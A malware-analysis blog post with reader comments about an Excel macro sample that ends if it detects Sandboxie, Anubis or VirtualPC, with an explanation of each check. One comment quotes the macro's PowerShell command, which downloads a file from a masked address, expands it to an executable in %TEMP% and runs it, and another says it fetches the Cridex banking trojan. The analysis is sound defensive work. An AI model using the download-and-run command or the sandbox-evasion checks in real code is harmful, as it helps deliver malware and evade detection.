Today I got an interesting maldoc sample (77f3949c2130b268bb18061bcb483d16): it will not activate if it runs in a sandboxed or virtualized environment.
The following statements are executed right before the malicious actions begin:
If IsSandBoxiePresent(1) = True Then End
If IsAnubisPresent(1) = True Then End
If IsVirtualPCPresent = True Then End
The presence of SandBoxie can be detected by the successful load of DLL Sbiedll.dll or the presence of string [#] in the Windows’ title. In this sample, the DLL is checked (1).
The presence of Anubis can be detected by checking the serial number of the system drive, checking Windows’ Product ID, checking the name of the application or the user. In this sample, the serial number is checked (1).
The presence of virtualization is detected by enumerating the services\disk and looking for strings “virual”, “vmware” or “vbox”.
With the help of Google, I discovered that the criminals copy/pasted 7 year old code posted on a forum here, here and here. It’s in Spanish, while the Excel document has code page 1251 ANSI Cyrillic.
Didier Stevens 
Soo…. we should surf from a VM pc.
Comment by Johann Wilkerson — Wednesday 11 March 2015 @ 21:11
Or… we should make our estate look like virtuals… untill they start trashing virtuals to try to upset the researchers of course 😉
Comment by Chris — Thursday 12 March 2015 @ 13:03
The VBA macro performs the PowerShell with the following command:
“cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://*.*.*.*/asdvx/fghs.php’,’%TEMP%\dsfsdFFFv.cab’); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;”
Comment by RobbyFux — Thursday 12 March 2015 @ 22:04
hxxp://*.*.*.*/asdvx/fghs.php downloads cridex banking trojan
Comment by RobbyFux — Thursday 12 March 2015 @ 22:10
sha256 37730a644aed8c76d8cc55bd2740c37d3ec488d3fa9b7c29aec4b52c160f0322
Comment by RobbyFux — Thursday 12 March 2015 @ 22:10